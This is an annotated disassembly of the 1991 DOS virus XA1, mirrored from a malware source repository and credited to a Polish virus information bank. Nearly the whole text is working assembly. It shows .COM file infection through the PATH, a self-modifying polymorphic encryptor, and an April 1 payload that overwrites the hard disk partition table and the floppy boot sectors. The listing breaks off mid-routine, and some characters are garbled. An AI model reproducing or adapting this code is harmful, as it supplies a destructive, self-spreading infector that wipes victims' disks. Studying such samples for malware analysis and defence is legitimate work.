mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
910 lines
30 KiB
NASM
910 lines
30 KiB
NASM
;==============================================
|
||
; Virus XA1 isolated in Poland in June 1991
|
||
;
|
||
; disassembled by Andrzej Kadlof July 1991
|
||
;
|
||
; (C) Polish Section of Virus Information Bank
|
||
;==============================================
|
||
|
||
; virus entry point
|
||
|
||
0100 EB07 jmp 0109
|
||
|
||
0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
|
||
0107 2A 00 ; generation counter, never used (?)
|
||
|
||
; prepare stack for tricks
|
||
; stack usage:
|
||
; [BP + 2] cleared but not used
|
||
; [BP + 0] offset in block
|
||
; [BP - 2] low byte of size of decrypted part and encryption key
|
||
|
||
0109 0E push cs ; make free space on stack
|
||
010A E80000 call 010D ; put current offset on the stack
|
||
010D FA cli ; disable interrupt to safe stack
|
||
010E 8BEC mov bp,sp
|
||
0110 58 pop ax
|
||
0111 32C0 xor al,al
|
||
0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
|
||
0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
|
||
|
||
; encrypt virus code, this routine is changed in different virus copies
|
||
|
||
011B B9CE05 mov cx,05CE ; length of decrypted block
|
||
011E B08C mov al,8C ; 8C is changed!
|
||
0120 8846FF mov [bp-01],al
|
||
0123 8B5E00 mov bx,[bp] ; current position in block
|
||
; ^^ changed, possible 3 wariants:
|
||
; ..5E.. mov bx,[bp] versions 0, 1, 2
|
||
; ..76.. mov si,[bp] versions 3, 4, 5
|
||
; ..7E.. mov di,[bp] versions 6, 7, 8
|
||
|
||
0126 884EFE mov [bp-02],cl ; low byte of counter
|
||
0129 8A4EFF mov cl,[bp-01] ; encrypt key
|
||
012C D207 rol byte ptr [bx],cl ; byte manipulation
|
||
; ^^^^ changed, possible 9 wariants:
|
||
; 000F add byte ptr [bx],cl version 0
|
||
; 300F xor byte ptr [bx],cl version 1
|
||
; D2O7 rol byte ptr [bx],cl version 2
|
||
; 000C add byte ptr [si],cl version 3
|
||
; 300C xor byte ptr [si],cl version 4
|
||
; D204 rol byte ptr [si],cl version 5
|
||
; 000D add byte ptr [di],cl version 6
|
||
; 300D xor byte ptr [di],cl version 7
|
||
; D205 rol byte ptr [di],cl version 8
|
||
|
||
012E EB00 jmp 0130 ; short pause
|
||
0130 43 inc bx ; position in block
|
||
; ^^ changed, possible 3 wariants:
|
||
; 43 inc bx version 0, 1, 2
|
||
; 46 inc si version 3, 4, 5
|
||
; 47 inc di version 6, 7, 8
|
||
|
||
0131 8A4EFE mov cl,[bp-02] ; restore block size
|
||
0134 E2F0 loop 0126 ; offset is decrypted!
|
||
|
||
; encrypted part
|
||
|
||
0136 FB sti
|
||
|
||
; get address of curent DTA and store it on the stack
|
||
|
||
0137 B42F mov ah,2F
|
||
0139 CD21 int 21
|
||
013B 06 push es
|
||
013C 53 push bx
|
||
|
||
; get keyboard status bits
|
||
|
||
013D 33C0 xor ax,ax
|
||
013F 8ED8 mov ds,ax
|
||
0141 A01704 mov al,[0417]
|
||
0144 2410 and al,10 ; extract scroll lock state
|
||
0146 50 push ax ; store
|
||
0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
|
||
|
||
; restore DS
|
||
|
||
014C 8CC8 mov ax,cs
|
||
014E 8ED8 mov ds,ax
|
||
|
||
; intercepte INT 24h
|
||
|
||
0150 BAC606 mov dx,06C6
|
||
0153 B82425 mov ax,2524 ; set interrupt vector
|
||
0156 CD21 int 21
|
||
|
||
; search for PATH= in environment block
|
||
|
||
0158 A12C00 mov ax,[002C] ; segment of environment block
|
||
015B 8EC0 mov es,ax
|
||
015D 33FF xor di,di ; begin of environment block
|
||
015F FC cld
|
||
|
||
0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
|
||
0164 741D je 0183 ; end fo block
|
||
|
||
0166 BE1B05 mov si,051B ; offset of string 'PATH='
|
||
0169 B90500 mov cx,0005 ; length of string
|
||
016C 8BC7 mov ax,di ; starting address
|
||
016E F3A6 rep cmpsb ; compare
|
||
0170 7411 je 0183 ; found
|
||
|
||
0172 8BF8 mov di,ax ; last starting point
|
||
0174 32C0 xor al,al
|
||
0176 B5FF mov ch,FF ; maximum block size
|
||
0178 F2AE repnz scasb
|
||
017A 74E4 je 0160
|
||
|
||
017C BF1A05 mov di,051A ; end of buffer for path
|
||
017F 8CC8 mov ax,cs ; restore ES
|
||
0181 8EC0 mov es,ax
|
||
0183 C706C1056205 mov word ptr [05C1],0562
|
||
|
||
; set local DTA
|
||
|
||
0189 BA3605 mov dx,0536
|
||
018C B41A mov ah,1A ; set DTA
|
||
018E CD21 int 21
|
||
|
||
0190 A1F906 mov ax,[06F9]
|
||
0193 A3F706 mov [06F7],ax
|
||
0196 A1FD06 mov ax,[06FD]
|
||
0199 A3FB06 mov [06FB],ax
|
||
019C B90500 mov cx,0005 ; counter of potential victims
|
||
019F BA1505 mov dx,0515 ; '*.COM', 0
|
||
01A2 06 push es
|
||
01A3 57 push di
|
||
01A4 51 push cx
|
||
|
||
01A5 8CC8 mov ax,cs
|
||
01A7 8EC0 mov es,ax
|
||
01A9 B9FFFF mov cx,FFFF ; all possible attributes
|
||
01AC B44E mov ah,4E ; find first
|
||
01AE EB06 jmp 01B6
|
||
|
||
01B0 59 pop cx ; restore counter
|
||
01B1 E35B jcxz 020E ; limit reached, check show/destruction
|
||
|
||
01B3 B44F mov ah,4F ; find next
|
||
01B5 51 push cx ; store counter
|
||
|
||
01B6 CD21 int 21
|
||
01B8 7203 jb 01BD ; continue
|
||
|
||
01BA E9F100 jmp 02AE
|
||
|
||
; restore address of path in environment block
|
||
|
||
01BD 59 pop cx
|
||
01BE 5F pop di
|
||
01BF 07 pop es
|
||
|
||
01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
|
||
01C4 744A je 0210 ; yes
|
||
|
||
; copy path to buffer
|
||
|
||
01C6 BB6205 mov bx,0562 ; offset of buffer
|
||
|
||
01C9 268A05 mov al,es:[di] ; next character
|
||
01CC 0AC0 or al,al ; end of block?
|
||
01CE 740A je 01DA ; yes
|
||
|
||
01D0 47 inc di
|
||
01D1 3C3B cmp al,3B ; ';', end of path?
|
||
01D3 7405 je 01DA ; yes
|
||
|
||
01D5 8807 mov [bx],al ; copy character
|
||
01D7 43 inc bx ; increase pointer
|
||
01D8 EBEF jmp 01C9 ; get next character
|
||
|
||
01DA 81FB6205 cmp bx,0562 ; buffer not empty?
|
||
01DE 74E0 je 01C0 ; empty
|
||
|
||
01E0 8A47FF mov al,[bx-01]
|
||
01E3 3C3A cmp al,3A ; ':', root directory
|
||
01E5 7408 je 01EF ; yes
|
||
|
||
01E7 3C5C cmp al,5C ; check last character, '\'
|
||
01E9 7404 je 01EF ; there is
|
||
|
||
01EB C6075C mov byte ptr [bx],5C ; add '\'
|
||
01EE 43 inc bx ; pointer to last character
|
||
01EF 06 push es
|
||
01F0 57 push di
|
||
01F1 51 push cx
|
||
01F2 891EC105 mov [05C1],bx ; store it
|
||
01F6 8BF3 mov si,bx
|
||
01F8 81EB6205 sub bx,0562 ; find path length
|
||
01FC 8BCB mov cx,bx
|
||
01FE BF1405 mov di,0514 ; destination buffer
|
||
0201 8CC8 mov ax,cs ; restore ES
|
||
0203 8EC0 mov es,ax
|
||
0205 4E dec si
|
||
0206 FD std
|
||
0207 F3A4 rep movsb ; copy
|
||
0209 8BD7 mov dx,di
|
||
020B 42 inc dx
|
||
020C EB97 jmp 01A5 ; find first
|
||
|
||
; end of infection proces, check condition for destruction/show
|
||
|
||
020E 58 pop ax ; balance stack
|
||
020F 58 pop ax
|
||
|
||
0210 8CC8 mov ax,cs ; restore ES
|
||
0212 8EC0 mov es,ax
|
||
|
||
; get date
|
||
|
||
0214 B42A mov ah,2A ; get date
|
||
0216 CD21 int 21
|
||
|
||
0218 81FA0104 cmp dx,0401 ; April 1?
|
||
021C 7533 jne 0251 ; no
|
||
|
||
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||
;
|
||
; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
|
||
;
|
||
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||
|
||
; copy partition table to sector 11h of side 0, track 0
|
||
|
||
021E BA8000 mov dx,0080 ; first hard drive
|
||
0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
|
||
0224 BB0307 mov bx,0703 ; destroy victim code
|
||
0227 B80102 mov ax,0201 ; read 1 sector
|
||
022A 52 push dx
|
||
022B 51 push cx
|
||
022C 53 push bx
|
||
022D CD13 int 13 ; disk I/O
|
||
022F 5B pop bx
|
||
0230 59 pop cx
|
||
0231 5A pop dx
|
||
0232 B111 mov cl,11 ; new place for partition table
|
||
0234 B80103 mov ax,0301 ; write partition table
|
||
0237 CD13 int 13
|
||
|
||
; set and of sector marker in the buffer
|
||
|
||
0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
|
||
|
||
; overwrite partition table
|
||
|
||
023F B280 mov dl,80
|
||
0241 E87404 call 06B8 ; write one sector to disk
|
||
|
||
; overwrite boot sector of drive A:
|
||
|
||
0244 32D2 xor dl,dl
|
||
0246 E86F04 call 06B8 ; write one sector do disk
|
||
|
||
; overwrite boot sector of drive B:
|
||
|
||
0249 B201 mov dl,01
|
||
024B E86A04 call 06B8 ; write disk
|
||
|
||
024E EB0A jmp 025A
|
||
0250 90 nop
|
||
|
||
; compare date
|
||
|
||
0251 81FA180C cmp dx,0C18 ; december 24?
|
||
0255 7203 jb 025A ; date earlier
|
||
|
||
;<><><><<><><><><><><><><><><><><><><><>
|
||
;
|
||
; CHRISTMAS SHOW
|
||
;
|
||
; see the description of subroutine 05D7
|
||
;<><><><><><><><><><><><><><><><><><><><><>
|
||
|
||
0257 E87D03 call 05D7 ; drow christmas tree
|
||
|
||
; make sound
|
||
|
||
025A E440 in al,40
|
||
025C 3CF8 cmp al,F8
|
||
025E 7206 jb 0266
|
||
|
||
0260 E461 in al,61
|
||
0262 0C03 or al,03
|
||
0264 E661 out 61,al
|
||
|
||
; restore the state of scroll lock flag
|
||
|
||
0266 33C0 xor ax,ax
|
||
0268 8ED8 mov ds,ax
|
||
026A 58 pop ax
|
||
026B 08061704 or [0417],al
|
||
|
||
; restore INT 24h
|
||
|
||
026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
|
||
0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
|
||
0279 B82425 mov ax,2524 ; set interrupt vector
|
||
027C CD21 int 21
|
||
|
||
; restore DTA
|
||
|
||
027E 5A pop dx
|
||
027F 1F pop ds
|
||
0280 B41A mov ah,1A ; set DTA
|
||
0282 CD21 int 21
|
||
|
||
; restore DS
|
||
|
||
0284 8CC8 mov ax,cs
|
||
0286 8ED8 mov ds,ax
|
||
|
||
0288 BEF006 mov si,06F0
|
||
028B 8B3EF706 mov di,[06F7]
|
||
028F 033EFB06 add di,[06FB]
|
||
0293 57 push di
|
||
0294 B90700 mov cx,0007
|
||
0297 FC cld
|
||
0298 F3A4 rep movsb
|
||
029A 33C0 xor ax,ax
|
||
029C 8BD8 mov bx,ax
|
||
029E 8BD0 mov dx,ax
|
||
02A0 8BE8 mov bp,ax
|
||
|
||
02A2 8B36F706 mov si,[06F7]
|
||
02A6 BF0001 mov di,0100
|
||
02A9 8B0EFB06 mov cx,[06FB]
|
||
02AD C3 ret
|
||
|
||
02AE BE5405 mov si,0554 ; file name in FCB
|
||
02B1 8B3EC105 mov di,[05C1] ; address of destination
|
||
02B5 B90D00 mov cx,000D ; length of asciiz string
|
||
02B8 FC cld
|
||
02B9 F3A4 rep movsb ; copy
|
||
02BB BF2005 mov di,0520 ; buffer for file name
|
||
02BE E8FA01 call 04BB ; copy
|
||
02C1 7503 jne 02C6
|
||
|
||
02C3 E9EAFE jmp 01B0 ; find next/destruct/show
|
||
|
||
02C6 BF2B05 mov di,052B
|
||
02C9 E8EF01 call 04BB ; copy file name
|
||
02CC 7503 jne 02D1
|
||
|
||
02CE E9DFFE jmp 01B0 ; find next/destruct/show
|
||
|
||
02D1 C606610500 mov byte ptr [0561],00
|
||
02D6 90 nop
|
||
02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
|
||
02DC 740F je 02ED ; hiden, system or read only, open file
|
||
|
||
02DE BA6205 mov dx,0562 ; file name
|
||
02E1 33C9 xor cx,cx ; clear all attributes
|
||
02E3 B80143 mov ax,4301 ; set file attributes
|
||
02E6 CD21 int 21
|
||
02E8 7303 jnb 02ED ; open file
|
||
|
||
02EA E9C3FE jmp 01B0 ; find next/destruct/show
|
||
|
||
02ED BA6205 mov dx,0562
|
||
02F0 B8023D mov ax,3D02 ; open file for read/write
|
||
02F3 CD21 int 21
|
||
|
||
02F5 8BD8 mov bx,ax ; handle
|
||
02F7 7303 jnb 02FC
|
||
|
||
02F9 E9B4FE jmp 01B0 ; find next
|
||
|
||
; check file size
|
||
|
||
02FC A15205 mov ax,[0552] ; high word of file size in DTA
|
||
02FF 0BC0 or ax,ax
|
||
0301 7403 je 0306 ; file below 64K
|
||
|
||
0303 E99001 jmp 0496 ; close file and find next
|
||
|
||
0306 A15005 mov ax,[0550] ; lower word of file size
|
||
0309 3D0700 cmp ax,0007 ; minimum file size
|
||
030C 72F5 jb 0303 ; close file and find next
|
||
|
||
030E 3D00F8 cmp ax,F800 ; maximum file size
|
||
0311 73F0 jnb 0303 ; close file and find next
|
||
|
||
; mayby already infected?
|
||
|
||
0313 8B16F706 mov dx,[06F7] ; form address of bufer
|
||
0317 0316FB06 add dx,[06FB]
|
||
031B B90700 mov cx,0007 ; number of bytes
|
||
031E 52 push dx
|
||
031F 51 push cx
|
||
0320 B43F mov ah,3F ; read file
|
||
0322 CD21 int 21
|
||
|
||
0324 59 pop cx
|
||
0325 5E pop si
|
||
0326 7208 jb 0330 ; read error, close and find next
|
||
|
||
; compare first 7 bytes with own code
|
||
|
||
0328 BF0001 mov di,0100 ; destination
|
||
032B FC cld
|
||
032C F3A6 rep cmpsb
|
||
032E 7503 jne 0333
|
||
|
||
0330 E96301 jmp 0496 ; close file and find next, (infected!)
|
||
|
||
; get and store file date and time
|
||
|
||
0333 B80057 mov ax,5700 ; get file time stamp
|
||
0336 CD21 int 21
|
||
0338 72F6 jb 0330 ; close file, find next
|
||
|
||
033A 89160107 mov [0701],dx ; store date
|
||
033E 890EFF06 mov [06FF],cx ; store time
|
||
0342 C606610501 mov byte ptr [0561],01
|
||
0347 90 nop
|
||
|
||
; check file size, if less than 603h bytes then append some garbage
|
||
|
||
0348 A15005 mov ax,[0550] ; file size
|
||
034B 3D0306 cmp ax,0603
|
||
034E 7321 jnb 0371
|
||
|
||
; file length is less than 603h, add some garbage
|
||
|
||
0350 33D2 xor dx,dx
|
||
0352 33C9 xor cx,cx
|
||
0354 B80242 mov ax,4202 ; move file ptr to EOF
|
||
0357 CD21 int 21
|
||
0359 7303 jnb 035E ; no errors, continue
|
||
|
||
035B E93801 jmp 0496 ; close file and find next
|
||
|
||
035E B90306 mov cx,0603 ; number of bytes
|
||
0361 2B0E5005 sub cx,[0550] ; file size
|
||
0365 B440 mov ah,40 ; write file
|
||
0367 CD21 int 21
|
||
0369 B80306 mov ax,0603 ; new file size
|
||
036C 7303 jnb 0371
|
||
|
||
036E E92501 jmp 0496 ; close file and find next
|
||
|
||
; now file is at least 603h bytes long
|
||
|
||
0371 FEC4 inc ah
|
||
0373 A3F906 mov [06F9],ax ; oryginal file size + 256
|
||
0376 A15005 mov ax,[0550] ; file size
|
||
0379 BE0306 mov si,0603 ; virus length
|
||
037C 33FF xor di,di
|
||
037E 3BC6 cmp ax,si
|
||
0380 7302 jnb 0384
|
||
|
||
0382 8BF0 mov si,ax
|
||
|
||
0384 8936FD06 mov [06FD],si
|
||
|
||
0388 8BD7 mov dx,di
|
||
038A 33C9 xor cx,cx
|
||
038C B80042 mov ax,4200 ; move file ptr to BOF
|
||
038F CD21 int 21
|
||
0391 7303 jnb 0396
|
||
|
||
0393 E90001 jmp 0496 ; close file and find next
|
||
|
||
0396 8B16F706 mov dx,[06F7]
|
||
039A 0316FB06 add dx,[06FB]
|
||
039E B90002 mov cx,0200
|
||
03A1 3BF1 cmp si,cx
|
||
03A3 7302 jnb 03A7
|
||
|
||
03A5 8BCE mov cx,si ; number of bytes
|
||
|
||
03A7 52 push dx
|
||
03A8 51 push cx
|
||
03A9 B43F mov ah,3F ; read file
|
||
03AB CD21 int 21
|
||
03AD 59 pop cx
|
||
03AE 5A pop dx
|
||
03AF 7303 jnb 03B4 ; continue
|
||
|
||
03B1 E9E200 jmp 0496 ; close file and find next
|
||
|
||
03B4 52 push dx
|
||
03B5 51 push cx
|
||
03B6 33D2 xor dx,dx
|
||
03B8 33C9 xor cx,cx
|
||
03BA B80242 mov ax,4202 ; move file ptr to EOF
|
||
03BD CD21 int 21
|
||
03BF 59 pop cx
|
||
03C0 5A pop dx
|
||
03C1 7303 jnb 03C6 ; continue
|
||
|
||
03C3 E9D000 jmp 0496 ; close file and find next
|
||
|
||
03C6 B440 mov ah,40 ; write file
|
||
03C8 CD21 int 21
|
||
03CA 7303 jnb 03CF
|
||
|
||
03CC E9C700 jmp 0496 ; close file and find next
|
||
|
||
03CF 81C70002 add di,0200
|
||
03D3 81EE0002 sub si,0200
|
||
03D7 7602 jbe 03DB
|
||
|
||
03D9 EBAD jmp 0388
|
||
|
||
03DB FF060701 inc word ptr [0107] ; infection counter
|
||
03DF 33D2 xor dx,dx
|
||
03E1 33C9 xor cx,cx
|
||
03E3 B80042 mov ax,4200 ; move file ptr to BOF
|
||
03E6 CD21 int 21
|
||
03E8 7303 jnb 03ED
|
||
|
||
03EA E9A900 jmp 0496 ; close file and find next
|
||
|
||
03ED 53 push bx ; store handle
|
||
03EE E440 in al,40
|
||
03F0 A807 test al,07
|
||
03F2 74FA je 03EE
|
||
|
||
03F4 A21F01 mov [011F],al ; change decryption key
|
||
|
||
; get random number from system timer count
|
||
|
||
03F7 33C0 xor ax,ax
|
||
03F9 8AF8 mov bh,al
|
||
03FB 8ED8 mov ds,ax
|
||
03FD A06C04 mov al,[046C] ; timer, low byte
|
||
|
||
0400 8CCA mov dx,cs ; restore DS
|
||
0402 8EDA mov ds,dx
|
||
|
||
; generate rundom number in BX in the range 0..8
|
||
|
||
0404 B103 mov cl,03
|
||
0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
|
||
0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
|
||
040A 32E4 xor ah,ah ; prepare division
|
||
040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
|
||
040E 8AC4 mov al,ah ; AL <- second remainder
|
||
0410 02C0 add al,al ; *2, AL in [0..4]
|
||
0412 02C4 add al,ah ; *3, AL in [0..6]
|
||
0414 02C5 add al,ch ; first remainder
|
||
0416 8AD8 mov bl,al ; BL in [0..8]
|
||
|
||
; multiply BX by 4 (table entry size)
|
||
|
||
0418 03DB add bx,bx
|
||
041A 03DB add bx,bx
|
||
041C 81C3C906 add bx,06C9 ; offset of table
|
||
|
||
; modify encryption routine (automodyfication)
|
||
|
||
0420 8A07 mov al,[bx]
|
||
0422 A22401 mov [0124],al ; 3 versions 5E/76/7E
|
||
0425 8B4701 mov ax,[bx+01]
|
||
0428 A32C01 mov [012C],ax ; 9 wersions
|
||
042B 8A4703 mov al,[bx+03] ; 3 versions
|
||
042E A23001 mov [0130],al
|
||
0431 8AC5 mov al,ch
|
||
|
||
; prepare decrypt routine
|
||
|
||
0433 BBED06 mov bx,06ED
|
||
0436 D7 xlat
|
||
0437 A26104 mov [0461],al ; modify decryption routine
|
||
|
||
; write new encryption routine to file
|
||
|
||
043A 5B pop bx ; restore handle
|
||
043B BA0001 mov dx,0100 ; begin of file
|
||
043E B93500 mov cx,0035 ; block size
|
||
0441 B440 mov ah,40 ; write file
|
||
0443 CD21 int 21
|
||
0445 724F jb 0496 ; close file and find next
|
||
|
||
; decryption routine
|
||
|
||
0447 BE3501 mov si,0135 ; start of decrypted block
|
||
044A B9CE05 mov cx,05CE ; size of decrypted block
|
||
044D 53 push bx ; store handle
|
||
044E 51 push cx
|
||
044F B80002 mov ax,0200
|
||
0452 8B1EF706 mov bx,[06F7]
|
||
0456 031EFB06 add bx,[06FB]
|
||
045A 53 push bx
|
||
045B 8A0E1F01 mov cl,[011F] ; decription key
|
||
|
||
045F 8A2C mov ch,[si]
|
||
0461 D2CD ror ch,cl ; <-- changed (3 variants)
|
||
|
||
; ^^ changed byte, possible wariants:
|
||
; 28CD sub ch,cl versions: 0, 3, 6
|
||
; 30CD xor ch,cl versions: 1, 4, 7
|
||
; D2CD ror ch,cl versions: 2, 5, 8
|
||
|
||
0463 882F mov [bx],ch
|
||
0465 43 inc bx
|
||
0466 46 inc si
|
||
0467 48 dec ax
|
||
0468 75F5 jne 045F
|
||
|
||
046A 5A pop dx
|
||
046B 59 pop cx
|
||
046C 5B pop bx
|
||
046D 51 push cx
|
||
046E 81F90102 cmp cx,0201
|
||
0472 7203 jb 0477
|
||
|
||
0474 B90002 mov cx,0200
|
||
0477 B440 mov ah,40 ; write file
|
||
0479 CD21 int 21
|
||
047B 59 pop cx
|
||
047C 7218 jb 0496 ; close file and find next
|
||
|
||
047E 81E90002 sub cx,0200
|
||
0482 77C9 ja 044D
|
||
|
||
; restore file time stamp
|
||
|
||
0484 8B160107 mov dx,[0701] ; file date
|
||
0488 8B0EFF06 mov cx,[06FF] ; file time
|
||
048C B80157 mov ax,5701 ; set file time stamp
|
||
048F CD21 int 21
|
||
0491 7203 jb 0496 ; close file and find next
|
||
|
||
; decrease counter on the stack
|
||
|
||
0493 59 pop cx
|
||
0494 49 dec cx
|
||
0495 51 push cx
|
||
|
||
0496 B43E mov ah,3E ; close file
|
||
0498 CD21 int 21
|
||
049A 8A0E4B05 mov cl,[054B] ; attributes
|
||
049E FE0E6105 dec byte ptr [0561]
|
||
04A2 7405 je 04A9
|
||
|
||
04A4 F6C107 test cl,07 ; hidden, system, read only
|
||
04A7 740F je 04B8
|
||
|
||
04A9 80F920 cmp cl,20 ; archive
|
||
04AC 740A je 04B8
|
||
|
||
04AE BA6205 mov dx,0562 ; file name
|
||
04B1 32ED xor ch,ch
|
||
04B3 B80143 mov ax,4301 ; set file attributes
|
||
04B6 CD21 int 21
|
||
04B8 E9F5FC jmp 01B0 ; find next
|
||
|
||
;----------------------------------------
|
||
; move 11 bytes do DS:DI ('C:\COMMAND.')
|
||
|
||
04BB BE6205 mov si,0562
|
||
04BE B90B00 mov cx,000B
|
||
04C1 FC cld
|
||
04C2 F3A6 rep cmpsb
|
||
04C4 C3 ret
|
||
|
||
; buffer for path
|
||
|
||
04C5 30 31 32 33 34 35 36 37 01234567
|
||
04CD 38 39 30 31 32 33 34 35 89012345
|
||
04D5 36 37 38 39 30 31 32 33 67890123
|
||
04DD 34 35 36 37 38 39 30 31 45678901
|
||
04E5 32 33 34 35 36 37 38 39 23456789
|
||
04ED 30 31 32 33 34 35 36 37 01234567
|
||
04F5 38 39 30 31 32 33 34 35 89012345
|
||
04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
|
||
0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
|
||
050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
|
||
|
||
; paterns for search
|
||
|
||
0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
|
||
051D 54 48 3D TH=
|
||
|
||
; buffers for file names
|
||
|
||
0520 49 42 4D 42 49 IBMBI
|
||
0525 4F 2E 43 4F 4D 00 O.COM
|
||
|
||
052B 49 42 IB
|
||
052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
|
||
0535 00
|
||
|
||
; local DTA
|
||
|
||
0536 03 3F 3F 3F 3F 3F 3F ;\
|
||
053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
|
||
0545 00 00 00 00 00 00 ;/
|
||
054B 20 ; file attribute
|
||
054C 00 60 71 0E ; file time stamp
|
||
0550 DB 62 00 00 ; file size
|
||
0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
|
||
|
||
0561 01 ; flag: attributes are changed
|
||
|
||
0562 43 3A 5C C:\
|
||
0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
|
||
056D 43 4F 4D 00 00 4D 00 00 COM M
|
||
0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
|
||
057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
|
||
0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
|
||
058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
|
||
0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
|
||
059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
|
||
05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
|
||
05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
|
||
05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
|
||
05BD 68 4E 6F 21 hNo!
|
||
|
||
05C1 65 05 ;
|
||
|
||
;---------------------------------------
|
||
; write character (or space) cx times
|
||
|
||
05C3 B020 mov al,20
|
||
|
||
05C5 50 push ax
|
||
05C6 E89E00 call 0667 ; write character
|
||
05C9 58 pop ax
|
||
05CA E2F9 loop 05C5
|
||
05CC C3 ret
|
||
|
||
;-------------
|
||
; next line
|
||
|
||
05CD B00D mov al,0D
|
||
05CF E89500 call 0667 ; write character
|
||
05D2 B00A mov al,0A
|
||
05D4 E99000 jmp 0667 ; write character
|
||
|
||
;------------------------------
|
||
; drow christmast tree
|
||
;
|
||
; result will look like this:
|
||
;
|
||
;
|
||
; <20>
|
||
; ***
|
||
; *****
|
||
; *******
|
||
; *********
|
||
; ***********
|
||
; *************
|
||
; ***************
|
||
; *****************
|
||
; *******************
|
||
; *********************
|
||
; ***********************
|
||
; *************************
|
||
; ***************************
|
||
; *****************************
|
||
; <20><><EFBFBD>
|
||
; <20><><EFBFBD>
|
||
; <20><><EFBFBD>
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; Und er lebt doch noch : Der Tannenbaum !
|
||
; Frohe Weihnachten ...
|
||
;
|
||
|
||
05D7 B92700 mov cx,0027
|
||
05DA E8E6FF call 05C3 ; clear 39 characters
|
||
05DD B0AD mov al,AD ; '<27>'
|
||
05DF E88500 call 0667 ; write character
|
||
05E2 E8E8FF call 05CD ; new line
|
||
05E5 BB0300 mov bx,0003
|
||
05E8 BA2600 mov dx,0026
|
||
|
||
05EB 8BCA mov cx,dx
|
||
05ED E8D3FF call 05C3 ; write CX spaces
|
||
05F0 8BCB mov cx,bx
|
||
05F2 B02A mov al,2A ; '*'
|
||
05F4 E8CEFF call 05C5 ; write CX characters
|
||
05F7 E8D3FF call 05CD ; new line
|
||
05FA 4A dec dx
|
||
05FB 83C302 add bx,0002
|
||
05FE 83FB1F cmp bx,001F
|
||
0601 75E8 jne 05EB
|
||
|
||
0603 BB0300 mov bx,0003
|
||
0606 B92600 mov cx,0026
|
||
0609 E8B7FF call 05C3 ; write CX spaces
|
||
060C B90300 mov cx,0003
|
||
060F B0DB mov al,DB ; '<27>'
|
||
0611 E8B1FF call 05C5 ; write CX characters
|
||
0614 E8B6FF call 05CD ; next line
|
||
0617 4B dec bx
|
||
0618 75EC jne 0606
|
||
|
||
061A B95000 mov cx,0050 ; full line
|
||
061D B0CD mov al,CD ; '<27>'
|
||
061F E8A3FF call 05C5 ; write character CX times
|
||
0622 B91300 mov cx,0013
|
||
0625 E89BFF call 05C3 ; write CX spaces
|
||
0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
|
||
062B E82C00 call 065A ; write string
|
||
062E B91D00 mov cx,001D
|
||
0631 E88FFF call 05C3 ; clear part of line
|
||
0634 EB24 jmp 065A ; write asciiz string pointed by BX
|
||
0636 90 nop
|
||
|
||
0637 E80000 call 063A
|
||
|
||
063A 5B pop bx
|
||
063B 83C30D add bx,000D
|
||
063E 8CC8 mov ax,cs
|
||
0640 8ED8 mov ds,ax
|
||
0642 E81500 call 065A ; write string
|
||
0645 EBFE jmp 0645 ; hang CPU
|
||
|
||
0647 41 70 72 69 6C 2C 20 41 April, A
|
||
064F 70 72 69 6C 20 2E 2E 2E pril ...
|
||
0657 20 07 00
|
||
|
||
;-----------------------------------
|
||
; write asciiz string pointed by BX
|
||
|
||
065A 8A07 mov al,[bx] ; get character
|
||
065C 43 inc bx ; next character
|
||
065D 0AC0 or al,al ; and of string?
|
||
065F 7405 je 0666 ; yes, RET
|
||
|
||
0661 E80300 call 0667 ; write character
|
||
